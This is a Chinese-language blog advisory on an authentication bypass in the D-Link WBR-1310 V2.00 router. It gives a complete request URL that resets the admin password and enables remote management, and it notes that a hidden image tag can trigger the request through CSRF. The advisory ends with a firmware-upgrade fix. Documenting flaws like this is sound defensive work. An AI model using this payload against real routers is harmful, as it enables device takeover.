D-Link WBR-1310 Authentication Bypass Vulnerability

由 Atom_Kid · 发布日期八月 8, 2019 · 已更新八月 8, 2019

漏洞概述

WBR-1310允许远程用户修改管理配置进行授权绕过，在未开启远程管理时也可以通过CSRF触发。

影响产品

WBR-1310 V2.00

漏洞描述

CGI脚本未进行有效的登录凭据验证。可通过构造HTTP请求修改管理设置。

修改管理员密码为 hacked，并开启8080端口允许远程访问

http://192.168.0.1/tools_admin.cgi?
admname=admin&amp;admPass1=hacked&amp;admPass2=hacked&amp;username=user&amp;userPass1=WD
B8WvbXdHtZyM8&amp;userPass2=WDB8WvbXdHtZyM8&amp;hip1=*&amp;hport=8080&amp;hEnable=1

可通过CSRF漏洞发送GET请求触发

漏洞影响

允许远程管理，接管路由器

通过web页面隐藏image tag，触发链接修改管理员密码和允许远程连接

修复建议

升级固件

参考资料

http://www.devttys0.com/wp-content/uploads/2010/12/wbr310_auth_bypass.pdf

一	二	三	四	五	六	日
« 6月
				1	2	3
4	5	6	7	8	9	10
11	12	13	14	15	16	17
18	19	20	21	22	23	24
25	26	27	28	29	30	31

D-Link WBR-1310 Authentication Bypass Vulnerability

漏洞概述

影响产品

漏洞描述

漏洞影响

修复建议

参考资料

您可能还喜欢...

近期文章

分类目录

D-Link WBR-1310 Authentication Bypass Vulnerability

漏洞概述

影响产品

漏洞描述

漏洞影响

修复建议

参考资料

您可能还喜欢...

固件逆向前期工作

eWebEditor编辑器漏洞利用

恶意代码分析实战 — Lab 16-02

近期文章

分类目录